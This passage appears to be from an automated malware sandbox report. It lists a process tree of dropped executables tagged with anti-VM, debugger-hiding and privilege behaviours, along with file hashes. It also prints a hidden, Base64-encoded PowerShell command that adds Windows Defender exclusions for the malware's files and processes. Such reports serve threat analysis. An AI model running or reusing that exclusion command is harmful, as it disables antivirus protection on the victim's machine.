                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3784
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                  1⤵
                                                                                                                                    PID:1872
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                    1⤵
                                                                                                                                      PID:1500
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                      1⤵
                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:2416
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3016
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{be72d710-f47c-4f90-808e-d0dd9df5bca7}\8a957e64-fb20-45fa-aeb7-83704ec39d8d.cmd"
                                                                                                                                      1⤵
                                                                                                                                        PID:5496
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:8388
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:13296
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6256
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6744
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:12392
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:7540
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:7460
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:7204
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:2960
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:7044
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6940
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          PID:6784
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6680
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6312
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:6232
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:11812
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:10896
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                            PID:10056
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:13012
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:10944
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:11324
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:12004
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            PID:5964
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            PID:9204
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:12836
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                              PID:12672
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              PID:12480
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:12128
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:11964
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:11860
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:11160
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:10632
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                                PID:10440
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                PID:10112
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:9520
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6592
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:5252
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:8952
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:8620
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6180
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:1928
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6100
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6472
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6528
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6600
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                PID:6624
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:4088
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:6720
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:4000
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:2680
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:4288
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:552
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:7164
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                  PID:7316
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  • Runs ping.exe
                                                                                                                                                  PID:7428
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  PID:8320
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  • Runs ping.exe
                                                                                                                                                  PID:5540
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:9332
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                    2⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:7648
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5416
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      PID:8704
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:9020
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:10916
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:12584
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:6148
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:7564
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:11376
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:6056
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:7032
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:12732
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:13228
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:12232
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:5836
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:10140
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        PID:9792
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:8888
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:8180
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:9676
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:5420
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:7368
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:6296
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:12048
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:6276
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:6180
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:4180
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:552
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:9996
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:7208
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:8860
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:1096
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBNAHAAUABSAGUARgBlAHIAZQBOAEMAZQAgAC0ARQBYAGMATAB1AHMAaQBvAE4AcABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAQwBFADsAIABBAEQARAAtAE0AcABQAFIARQBmAGUAcgBlAE4AYwBFACAALQBlAFgAQwBsAHUAUwBJAG8AbgBQAFIAbwBDAGUAcwBTACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAG8AUgBDAEUA
                                                                                                                                                        1⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:7576
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6412
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                          1⤵
                                                                                                                                                            PID:684
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6452
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:11272
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:11016
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:9084

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_750fb06ba_arkmon.sys

                                                                                                                                                                    Filesize

                                                                                                                                                                    390KB

                                                                                                                                                                    MD5

                                                                                                                                                                    7c924dd4d20055c80007791130e2d03f

                                                                                                                                                                    SHA1

                                                                                                                                                                    072f004ddcc8ddf12aba64e09d7ee0ce3030973e

                                                                                                                                                                    SHA256

                                                                                                                                                                    406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

                                                                                                                                                                    SHA512

                                                                                                                                                                    ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

                                                                                                                                                                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.9MB

                                                                                                                                                                    MD5

                                                                                                                                                                    bcbec32483eb43840823c4f6bd653779

                                                                                                                                                                    SHA1

                                                                                                                                                                    3b83255512c5f268d0a1cb2997b1cc9d40f4252d

                                                                                                                                                                    SHA256

                                                                                                                                                                    d8a8e71a2be6d5fafa5d49029a37751c78be7e007152859233b8020a5c258167

                                                                                                                                                                    SHA512

                                                                                                                                                                    4cb807157807c72d599305eada37e85330314e43061f9af3ab9c44839bfc945431e320adf5259b9a9ecb531368cd9ab91d047eb8874f0ce6a8d4022ed69a6408

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                    Filesize

                                                                                                                                                                    2B

                                                                                                                                                                    MD5

                                                                                                                                                                    d751713988987e9331980363e24189ce

                                                                                                                                                                    SHA1

                                                                                                                                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                    SHA256

                                                                                                                                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                    SHA512

                                                                                                                                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

